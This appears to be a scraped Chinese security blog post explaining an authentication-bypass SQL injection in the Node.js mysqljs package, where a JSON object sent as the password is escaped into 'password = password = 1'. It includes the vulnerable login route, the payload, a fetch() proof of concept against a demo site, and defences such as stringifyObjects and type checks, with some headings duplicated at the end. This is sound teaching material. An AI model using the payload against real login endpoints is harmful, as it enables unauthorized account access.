MySQLjs 中的 SQL 注入技巧分析<\/h1>

前言<\/h2>
本文分析在 Node.js 生态中广泛使用的 mysqljs\/mysql 包中发现的一种利用转义函数进行 SQL 注入的技术。这种技术在 Blackhat MEA CTF 2024 中出现过，展示了如何绕过常见的过滤函数实现 SQL 注入，特别是在"万能密码"场景中的应用。<\/p>

技术背景<\/h2>
在 mysqljs\/mysql 中，开发者通常使用以下方法来防止 SQL 注入：<\/p>
connect.escape()<\/code><\/li>
mysql.escape()<\/code><\/li>
pool.escape()<\/code><\/li>
使用 ?<\/code> 作为占位符的预处理语句<\/li>
<\/ul>
漏洞原理<\/h2>
转义函数的特性<\/h3>
mysqljs 的转义函数对不同数据类型的处理方式不同：<\/p>
SqlString<\/span>.escape<\/span> =<\/span> function<\/span> escape<\/span>(val<\/span>, stringifyObjects<\/span>, timeZone<\/span>) {
<\/span><\/span>  if<\/span> (val<\/span> ===<\/span> undefined<\/span> ||<\/span> val<\/span> ===<\/span> null<\/span>) {
<\/span><\/span>    return<\/span> 'NULL'<\/span>;
<\/span><\/span>  }
<\/span><\/span>  switch<\/span> (typeof<\/span> val<\/span>) {
<\/span><\/span>    case<\/span> 'boolean'<\/span>:<\/span> return<\/span> (val<\/span>) ?<\/span> 'true'<\/span> :<\/span> 'false'<\/span>;
<\/span><\/span>    case<\/span> 'number'<\/span>:<\/span> return<\/span> val<\/span> +<\/span> ''<\/span>;
<\/span><\/span>    case<\/span> 'object'<\/span>:<\/span>
<\/span><\/span>      if<\/span> (val<\/span> instanceof<\/span> Date) {
<\/span><\/span>        return<\/span> SqlString<\/span>.dateToString<\/span>(val<\/span>, timeZone<\/span> ||<\/span> 'local'<\/span>);
<\/span><\/span>      } else<\/span> if<\/span> (Array.isArray<\/span>(val<\/span>)) {
<\/span><\/span>        return<\/span> SqlString<\/span>.arrayToList<\/span>(val<\/span>, timeZone<\/span>);
<\/span><\/span>      } else<\/span> if<\/span> (Buffer<\/span>.isBuffer<\/span>(val<\/span>)) {
<\/span><\/span>        return<\/span> SqlString<\/span>.bufferToString<\/span>(val<\/span>);
<\/span><\/span>      } else<\/span> if<\/span> (typeof<\/span> val<\/span>.toSqlString<\/span> ===<\/span> 'function'<\/span>) {
<\/span><\/span>        return<\/span> String(val<\/span>.toSqlString<\/span>());
<\/span><\/span>      } else<\/span> if<\/span> (stringifyObjects<\/span>) {
<\/span><\/span>        return<\/span> escapeString<\/span>(val<\/span>.toString<\/span>());
<\/span><\/span>      } else<\/span> {
<\/span><\/span>        return<\/span> SqlString<\/span>.objectToValues<\/span>(val<\/span>, timeZone<\/span>);
<\/span><\/span>      }
<\/span><\/span>    default<\/span>:<\/span> return<\/span> escapeString<\/span>(val<\/span>);
<\/span><\/span>  }
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>关键点在于对对象的处理：当传入一个对象时，如果没有设置 stringifyObjects<\/code> 选项，会调用 objectToValues<\/code> 方法，将对象转换为 key = 'val'<\/code> 的形式。<\/p>
漏洞利用<\/h3>
考虑以下登录代码：<\/p>
app<\/span>.post<\/span>("\/auth"<\/span>, function<\/span>(request<\/span>, respond<\/span>) {
<\/span><\/span>  var<\/span> username<\/span> =<\/span> request<\/span>.body<\/span>.username<\/span>;
<\/span><\/span>  var<\/span> password<\/span> =<\/span> request<\/span>.body<\/span>.password<\/span>;
<\/span><\/span>  if<\/span> (username<\/span> &&<\/span> password<\/span>) {
<\/span><\/span>    connection<\/span>.query<\/span>(
<\/span><\/span>      "SELECT * FROM accounts WHERE username = ? AND password = ?"<\/span>,
<\/span><\/span>      [username<\/span>, password<\/span>],
<\/span><\/span>      function<\/span>(error<\/span>, result<\/span>, field<\/span>) {
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>      }
<\/span><\/span>    );
<\/span><\/span>  }
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>看起来使用了预处理语句，应该是安全的。但是，如果 Express 的 body-parser<\/code> 允许 JSON 输入，攻击者可以构造一个特殊的 payload：<\/p>
{
<\/span><\/span>  "username"<\/span>:<\/span> "admin"<\/span>,
<\/span><\/span>  "password"<\/span>:<\/span> {
<\/span><\/span>    "password"<\/span>:<\/span> 1<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当这个对象被传递给 mysqljs 的转义函数时，会生成类似 password = password = 1<\/code> 的 SQL 片段，最终形成：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> accounts WHERE<\/span> username =<\/span> 'admin'<\/span> AND<\/span> password =<\/span> password =<\/span> 1<\/span>
<\/span><\/span><\/code><\/pre>这在 MySQL 中会被解释为比较操作，如果 password<\/code> 列的值等于 password<\/code> 变量的值（即 1），则条件成立，实现"万能密码"的效果。<\/p>
漏洞复现<\/h2>
环境搭建<\/h3>
使用以下漏洞演示项目：

https:\/\/github.com\/stypr\/vulnerable-nodejs-express-mysql<\/p>
攻击步骤<\/h3>

构造恶意请求：<\/li>
<\/ol>
data<\/span> =<\/span> {
<\/span><\/span>  username<\/span>:<\/span> "admin"<\/span>,
<\/span><\/span>  password<\/span>:<\/span> {
<\/span><\/span>    password<\/span>:<\/span> 1<\/span>,
<\/span><\/span>  },
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>fetch<\/span>("https:\/\/sqli.blog-demo.flatt.training\/auth"<\/span>, {
<\/span><\/span>  headers<\/span>:<\/span> {
<\/span><\/span>    "content-type"<\/span>:<\/span> "application\/json"<\/span>,
<\/span><\/span>  },
<\/span><\/span>  body<\/span>:<\/span> JSON<\/span>.stringify<\/span>(data<\/span>),
<\/span><\/span>  method<\/span>:<\/span> "POST"<\/span>,
<\/span><\/span>  mode<\/span>:<\/span> "cors"<\/span>,
<\/span><\/span>  credentials<\/span>:<\/span> "include"<\/span>,
<\/span><\/span>})
<\/span><\/span>  .then<\/span>((r<\/span>) => r<\/span>.text<\/span>())
<\/span><\/span>  .then<\/span>((r<\/span>) => {
<\/span><\/span>    console<\/span>.log<\/span>(r<\/span>);
<\/span><\/span>  });
<\/span><\/span><\/code><\/pre>
观察响应，成功绕过认证<\/li>
<\/ol>
深入分析<\/h2>
数据类型测试<\/h3>
测试不同数据类型对 SQL 语句的影响：<\/p>
var<\/span> password_list<\/span> =<\/span> [
<\/span><\/span>  12341234<\/span>, \/\/ Numbers
<\/span><\/span><\/span><\/span>  true<\/span>, \/\/ Booleans
<\/span><\/span><\/span><\/span>  new<\/span> Date("December 17, 1995 03:24:00"<\/span>), \/\/ Date
<\/span><\/span><\/span><\/span>  new<\/span> String("test_password_string"<\/span>), \/\/ String Object
<\/span><\/span><\/span><\/span>  "test_password_string"<\/span>, \/\/ String
<\/span><\/span><\/span><\/span>  ["array_test_1"<\/span>, "array_test_2"<\/span>], \/\/ Array
<\/span><\/span><\/span><\/span>  [["a"<\/span>, "b"<\/span>], ["c"<\/span>, "d"<\/span>]], \/\/ Nested Array
<\/span><\/span><\/span><\/span>  { obj_key_1<\/span>:<\/span> "obj_val_1"<\/span> }, \/\/ Object
<\/span><\/span><\/span><\/span>  undefined<\/span>,
<\/span><\/span>  null<\/span>,
<\/span><\/span>];
<\/span><\/span><\/code><\/pre>关键发现：对象类型会被转换为 key = 'val'<\/code> 形式，这是漏洞利用的关键。<\/p>
防御措施<\/h2>
方案一：启用 stringifyObjects<\/h3>
在创建连接时设置 stringifyObjects: true<\/code>：<\/p>
var<\/span> connection<\/span> =<\/span> mysql<\/span>.createConnection<\/span>({
<\/span><\/span>  host<\/span>:<\/span> "db"<\/span>,
<\/span><\/span>  user<\/span>:<\/span> "login"<\/span>,
<\/span><\/span>  password<\/span>:<\/span> "login"<\/span>,
<\/span><\/span>  database<\/span>:<\/span> "login"<\/span>,
<\/span><\/span>  stringifyObjects<\/span>:<\/span> true<\/span>,
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>方案二：输入类型检查<\/h3>
在接收参数时检查数据类型：<\/p>
app<\/span>.post<\/span>("\/auth"<\/span>, function<\/span>(request<\/span>, response<\/span>) {
<\/span><\/span>  var<\/span> username<\/span> =<\/span> request<\/span>.body<\/span>.username<\/span>;
<\/span><\/span>  var<\/span> password<\/span> =<\/span> request<\/span>.body<\/span>.password<\/span>;
<\/span><\/span>  
<\/span><\/span>  \/\/ 拒绝非字符串类型的输入
<\/span><\/span><\/span><\/span>  if<\/span> (typeof<\/span> username<\/span> !=<\/span> "string"<\/span> ||<\/span> typeof<\/span> password<\/span> !=<\/span> "string"<\/span>) {
<\/span><\/span>    response<\/span>.send<\/span>("Invalid parameters!"<\/span>);
<\/span><\/span>    response<\/span>.end<\/span>();
<\/span><\/span>    return<\/span>;
<\/span><\/span>  }
<\/span><\/span>  
<\/span><\/span>  if<\/span> (username<\/span> &&<\/span> password<\/span>) {
<\/span><\/span>    connection<\/span>.query<\/span>(
<\/span><\/span>      "SELECT * FROM accounts WHERE username = ? AND password = ?"<\/span>,
<\/span><\/span>      [username<\/span>, password<\/span>],
<\/span><\/span>      function<\/span>(error<\/span>, results<\/span>, fields<\/span>) {
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>      }
<\/span><\/span>    );
<\/span><\/span>  }
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>总结<\/h2>
这种 SQL 注入技术利用了 mysqljs 对对象类型的特殊处理方式，通过构造特定的对象绕过预处理语句的保护。它展示了几个重要的安全原则：<\/p>

即使使用了预处理语句，也需要关注库的具体实现<\/li>
输入验证应该包括类型检查<\/li>
了解依赖库的安全配置选项非常重要<\/li>
<\/ol>
这种技术在实际渗透测试中可能被忽视，因为常规的 SQL 注入字典中通常不包含这类 payload。开发者和安全研究人员都应该关注这类非传统的攻击向量。<\/p>
MySQLjs 中的 SQL 注入技巧分析<\/h1>

漏洞原理<\/h2>

环境搭建<\/h3> 使用以下漏洞演示项目： https:\/\/github.com\/stypr\/vulnerable-nodejs-express-mysql<\/p>

深入分析<\/h2>

环境搭建<\/h3>
使用以下漏洞演示项目：
https:\/\/github.com\/stypr\/vulnerable-nodejs-express-mysql<\/p>
